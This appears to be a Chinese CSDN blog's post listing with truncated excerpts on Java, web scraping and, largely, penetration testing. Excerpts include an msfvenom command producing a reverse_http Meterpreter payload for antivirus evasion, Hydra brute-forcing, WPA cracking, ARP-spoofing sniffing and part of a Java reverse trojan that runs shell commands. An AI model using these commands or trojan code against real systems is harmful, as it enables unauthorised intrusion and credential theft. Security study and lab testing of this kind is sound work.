- 博客(58)
- 资源 (3)
- 收藏
- 关注
转载 ubuntu 安装 apktool
进入官网Apktool install 可以看到这些Download Linux wrapper script (Right click, Save Link As apktool)Download apktool-2 (find newest here)Make sure you have the 32bit libraries (ia32-libs) downloaded an
2017-12-19 11:25:37 366
转载 如何理解云计算?很简单,就像吃货想吃披萨了
如何理解云计算?很简单,就像吃货想吃披萨了...[日期:2015-04-13]来源:云计算头条微信公众号 作者:[字体:大 中 小]你一定听说过云计算中的三个“高大上”的你一定听说过云计算中的三个“高大上”的概念:IaaS、PaaS和SaaS,这几个术语并不好理解。不过,如果你是个吃货,还喜欢披萨,这个问题就好解决了!好吧,其实你根本不
2017-11-16 10:27:00 433
转载 未来数据中心网络的三大武器: SDN、Overlay、VDC
短短几年间,很多人从不知道什么是SDN、Trill、VXlan,对这些技术不屑一顾,到现在几乎每个数据中心都在谋求转型,每个从事信息技术的人如果还不知道这些单词是什么就Out了,就像这年头还不用微信一样,跟不上主潮流了。当然这些新技术之所以被提出来,并得到很多人的响应和热捧,是因为随着应用的复杂化,人们信息需求不断增加,现有数据中心出现了不少自身无法解决的 问题,必须要对现有数据中心进行优
2017-09-27 10:23:34 747
转载 Wireshark实战之局域网监听
直接上手网络工程师的最爱Wireshark.它是一款本地监听数据的大杀器,弊端是只能监听本地的数据,有什么办法可以让局域网中的流量都从本机走呢?第一ARP嗅探,劫持网关,再本地抓包.第二交换机镜像端口,在路由或者交换机处设置,复制一份数据到指定机子端口.第三Ap一个无线,让他们连接,然后再抓包.第一种方法不用考虑,第二种方法因为企业级路由才有镜像端口功能,我等屌丝用的TP-LINK无这
2017-09-24 11:03:54 40147 3
转载 域环境提权、编辑注册表
Token(令牌),域环境中提权用户每次登录时,账号绑定临时的token;访问资源时提交token进行身份验证,类似于web cookie。Delegate Token:交互会话登录,(例如直接登录、远程桌面登录)Impersonate Token:非交互登录,(例如访问文件共享)注意:在域环境中,Delegate Token账号注销后变成Impersonate Token
2017-09-20 11:27:35 1121
转载 metasploit port 详细使用方法
信息收集:auxiliary/sniffer/psnuffle 嗅探抓包auxiliary/scanner/http/dir_scanner 扫描网站目录auxiliary/gather/search_email_collector
2017-09-20 09:20:27 1956
转载 使用MSF生成的shellcode打造免杀payload
环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode :msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f cwin7中使用Visual studio创建Win32控制台项目
2017-09-19 15:09:03 7424
转载 火狐浏览器下burpsuite 抓取https数据包
1.环境Windows 10火狐浏览器51.0.1burpsuite pro1.7112.过程1)本人使用的是burpsuite 的默认代理设置 2)设置火狐的代理服务:选项 –>高级–>网络–>设置 配置成burpsuite 一样的地址和端口 3)在火狐中输入地址:http://burp 点击CA Certificate 下载证书
2017-09-15 01:17:29 3211
转载 使用aircrack-ng工具破解wifi密码
目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。本文将教大家破解用wpa/wpa2加密方式的wifi密码。现在就让我们开始吧!工具(海淘回来的网卡):工具:TL-WN7
2017-09-13 10:35:55 2055
转载 Linux下使用hydra获取linux和windows系统用户名和密码的教程
本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。第一步:找到网段内存活的主机使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 从up.txt
2017-09-13 10:26:48 948
转载 文件包含漏洞原理分析
文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复习的时候,才发现,包含这个漏洞在各大语言中,都存在的,只不过现在大部分网站都是PHP网站,所以存在这个
2017-09-11 16:33:38 1509
转载 metasploit之客户端渗透
0x00 概要我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们想目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来欺骗对方,使其中招。这篇文章中我们主要会使用到metasploit中的msfvenom这个工具,如果大家对msfvenom这个工具不了解的话可以参考我这篇博客:metasploit
2017-09-05 08:48:11 1267
转载 metasploit获取shell之后进一步利用!metasploit+sessions
当你用metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用当你看到了[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代表这你在目标系统上成功的获得了
2017-09-02 16:56:32 10041
原创 使用Burp Suite进行XSS渗透测试 (只为自己做个备忘,甚读)
使用Burp Suite进行XSS渗透测试测试环境:webgoat burp Suite 测试网址:http://192.168.1.104:8080/WebGoat/start.mvc#attack/1406352188/9001)在输入框中输入!@#$[]()"",返回 * Whoops, you entered [!@#$[]()""] instead of your thr
2017-09-01 13:25:12 6126
转载 TCP空闲扫描实例
上面一篇笔记简单的介绍了一下 TCP 空闲扫描的原理,现在来动手操作了~恩,虽然 Nmap 也提供了一定的扫描空闲主机的功能吧,但是觉得还是 MSF 的 ipidseq 扫描器用起来比较方便,正好可以开始讲讲 MSF 中模块的使用方法。首先我们启动postgresql数据库服务,打开 MSF 终端。open-pg-and-msf.png然后在 MSF 终端里输入use
2017-08-28 22:37:09 1023
转载 TCP空闲扫描原理
TCP空闲扫描是一种隐秘的扫描技术,要知道它的原理,首先要介绍一下一般端口扫描的原理。判断一个TCP端口是否开放,其中一种方法是向该端口发送一个 SYN(建立会话) 数据包,如果该端口是开放的,则它会返回一个 SYN/ACK(会话确认) 数据包;如果该端口是关闭的,则它返回 RST(重置) 数据包;如果端口是被过滤状态,则它什么都不返回。一般来说我们通过这种方法判断扫描的主机端口是否开放。
2017-08-28 22:27:21 936
转载 常见端口入侵方法剖析
1.21端口渗透剖析FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理。一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器。这里以Serv_uFTP服务器为例,剖析渗透FTP服务器的几种方法。(1)对Serv_u5.004以及以下版本可直接使用溢出程序进行远程溢出,成功后可直接得到系统权限。使用Metasploit渗透工具包进行溢出。这个工
2017-08-24 11:10:22 20573 1
转载 学习Spring必学的Java基础知识(6)----ThreadLocal
我们知道Spring通过各种模板类降低了开发者使用各种数据持久技术的难度。这些模板类都是线程安全的,也就是说,多个DAO可以复用同一个模板实例而不会发生冲突。我们使用模板类访问底层数据,根据持久化技术的不同,模板类需要绑定数据连接或会话的资源。但这些资源本身是非线程安全的,也就是说它们不能在同一时刻被多个线程共享。虽然模板类通过资源池获取数据连接或会话,但资源池本身解决的是数据连接或会话的缓存问题
2017-08-14 09:25:01 222
转载 学习Spring必学的Java基础知识(2)----动态代理
Spring AOP使用动态代理技术在运行期织入增强的代码,为了揭示Spring AOP底层的工作机理,有必要对涉及到的Java知识进行学习。Spring AOP使用了两种代理机制:一种是基于JDK的动态代理;另一种是基于CGLib的动态代理。之所以需要两种代理机制,很大程度上是因为JDK本身只提供接口的代理,而不支持类的代理。带有横切逻辑的实例我们通过具体化代码实现上一节所介绍例
2017-08-11 10:34:48 276
转载 Java反射知识
Java语言允许通过程序化的方式间接对Class进行操作,Class文件由类装载器装载后,在JVM中将形成一份描述Class结构的元信息对象,通过该元信息对象可以获知Class的结构信息:如构造函数、属性和方法等。Java允许用户借由这个Class相关的元信息对象间接调用Class对象的功能,这就为使用程序化方式操作Class对象开辟了途径。简单实例 我们将从一个简单例子开始
2017-08-10 16:56:18 163
原创 爬虫 登录csdn并获取个人博客文章列表
# coding:utf-8import requestsfrom lxml import etreeis_next=True #全局变量class csdncrawl(): #获取登录时所需的post参数 def get_params(self,username,password,post_url,post_session,post_headers):
2017-07-28 10:10:49 346
转载 用Pycharm打开Scrapy项目
首先得有一个Scrapy项目,我在Desktop上新建一个Scrapy的项目叫test,在Desktop目录打开命令行,键入命令:scrapy startproject test1 目录结构如下: 打开Pycharm,选择open 选择项目,ok 打开如下界面之后,按alt + 1, 打开pro
2017-07-24 04:51:45 494
转载 XPath学习:基本语法
XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历。 1、斜线/从根节点选择,基本的XPath语法类似于在一个文件系统中定位文件,如果路径以斜线 / 开始, 那么该路径就表示到一个元素的绝对路径,获取满足该路径的所有节点: 选择根元素 语法:/AAA AAA> BBB/>
2017-06-15 15:53:19 420
转载 Eclipse使用技巧总结
一、快捷键1、提示:Alt+/2、格式化:ctrl+shift+f3、输入一对的符号,如”",(),会自动补全,输入后跳出:tab4、查找某个方法被谁调用:选中方法名,ctrl+shift+g5、查看某个类的继承关系:选中该类,ctrl+t6、通过文件名称查找类或文件:ctrl+shift+r7、alt+上/下,移动当前行到上或下8、
2017-06-04 09:26:26 298
转载 同步加载、异步加载、延迟加载
一、同步加载 平常默认用的都是同步加载。如:http://yourdomain.com/script.js"> 同步模式又称阻塞模式,会阻止浏览器的后续处理,停止了后续的文件的解析,执行,如图像的渲染。流览器之所以会采用同步模式,是因为加载的js文件中有对dom的操作,重定向,输出document等默认行为,所以同步才是最安全的。通常会把要加载的js放到body结束标签之前,使得js
2017-05-24 16:45:17 222
转载 关闭445端口
1.点击注册表选项”HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters“ 然后,在Parameters这个子项的右侧,点击鼠标右键,“新建”,“QWORD(64位)值”,然后重命名为“SMBDeviceEnabled”,再把这个子键的值改为0。2.关掉server 服务
2017-05-24 00:35:47 721
转载 HttpClient4.5.2 使用cookie保持会话——获取cookie之后如何传递它
摘要: 如果是同一个HttpClient没有关闭的时,HttpClient4可以保持会话,如果关闭了,那么就需要我们为每个HttpClient 添加cookie 来维持回话。本文以HttpClient4.5.2 进行阐述。本篇主要是描述获取cookie之后,如何传递它,如有不足,欢迎指正。谢谢!接着上篇HttpClient4.5.2 使用cookie保持会话——获取cookie(1) 之后
2017-05-23 16:56:52 960
转载 HttpClient4.5.2 使用cookie保持会话——获取cookie
摘要: 如果是同一个HttpClient没有关闭的时,HttpClient4可以保持会话,如果关闭了,那么就需要我们为每个HttpClient 添加cookie 来维持回话。本文以HttpClient4.5.2 进行阐述。本篇主要是描述如何获取cookie,如有不足,欢迎指正。谢谢!首先,我们建立了一个java maven项目,之后我们添加HttpClient4.5.2 的依赖1、
2017-05-23 16:55:42 691
转载 Handler 原理分析和使用
它在整个 Android 应用层面非常之关键,他是线程间相互通信的主要手段。最为常用的是其他线程通过Handler向主线程发送消息,更新主线程UI。下面是一个最简单的例子。 1 import android.os.Handler; 2 import android.os.Looper; 3 import android.os.Message; 4 import android
2017-05-22 21:25:31 200
转载 HTTP访问的两种方式
使用HttpClient:NameValuePair nameValuePair1 = newBasicNameValuePair("name", "yang");NameValuePair nameValuePair2 = newBasicNameValuePair("pwd","123123");List nameValuePairs = new ArrayList();nam
2017-05-19 15:42:25 300
转载 HttpClient4.5 简单入门
HttpClient4.5 简单入门博客分类:httpclienthttpclientgetposthttp 一、所需要的jar包 httpclient-4.5.jar httpcore-4.4.1.jar httpmime-4.5.jar二、实例Java代码 package cn.tzz.apache.ht
2017-05-16 16:46:58 313
转载 基于HttpClient4.5.1实现
httpclient是Apache下的一个用于执行http网络访问的一个工具包。大致流程:新建一个httpclient对象->新建一个httpRequest对象->用httpclient去执行->得到一个response->通过解析这个response来获取自己所需要的信息。 一、新建httpClient对象:在httpClient4.5中,初始化的方式已经和以前版本有一些不同。
2017-05-16 14:37:51 1069
转载 用JSONObject解析和处理json数据
本文中主要介绍JSONObject处理json数据时候的一些常用场景和方法。(一)jar包下载所需jar包打包下载百度网盘地址:https://pan.baidu.com/s/1c27Uyre (二)常见场景及处理方法1、解析简单的json字符串:1 // 简单的json测试字符串2 public static final String JS
2017-05-12 17:09:00 747
转载 GSON解析Json格式数据
GSON是谷歌提供的开源库,用来解析Json格式的数据,非常好用。如果要使用GSON的话,则要先下载gson-2.2.4.jar这个文件,如果是在Android项目中使用,则在Android项目的libs目录下添加这个文件即可;如果是在Java项目中,则把gson-2.2.4.jar先添加到当前项目的任意一个包中,然后右键点击这个jar包 -> 构建路径 -> 添加至构建路径。这样准备工作就做好了
2017-05-12 11:25:49 318
转载 示例程序: 获取所有链接
package org.jsoup.examples;import org.jsoup.Jsoup;import org.jsoup.helper.Validate;import org.jsoup.nodes.Document;import org.jsoup.nodes.Element;import org.jsoup.select.Elements;import java.i
2017-05-10 16:22:38 2117
转载 Jsoup解析Html教程
下载Jsouphttp://jsoup.org/download查看官方提供的手册:http://jsoup.org/cookbook/获取一个Document,这是Jsoup最核心的一个对象有三种途径来加载Document:字符串,URL地址,文件/** * */package org.xdemo.
2017-05-10 09:55:37 318
原创 获取网页标题
public void fetchTitle(){String url = "http://www.hainan.net";try{Document doc = Jsoup.connect(url).get();Element element=doc.getElementById("cms_fragment_4565_ul");Elements links = elemen
2017-05-09 23:47:43 1309
原创 获取网页链接
public void fetchLink(){String url = "http://www.hainan.net";try{Document doc = Jsoup.connect(url).get();Elements links = doc.select("a[href]");for (Element link : links){String
2017-05-09 22:45:49 629
原创 java 木马开发(9)---服务端 完结 完整代码
/* * 目标电脑操作系统是LINUX时 调用此模块 * 反弹木马 由服务端主动连接客户端 */ import java.awt.AWTException; import java.awt.Color; import java.awt.FlowLayout; import java.awt.Font; import java.awt.Gra
2017-02-25 09:11:03 2822 1
原创 java 木马开发(8)---服务端--- 调用平台shell去执行输入指令
服务端执行输入linux命令,并将返回结果传回//java在linux环境下调用平台shell去执行输入的指令参数 cmd 指令 void shellExe(String cmd) { try { String[] cmdA = { "/bin/sh", "-c", cmd }; //cmd是需要执行命令 Pr
2017-02-25 09:08:23 622
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人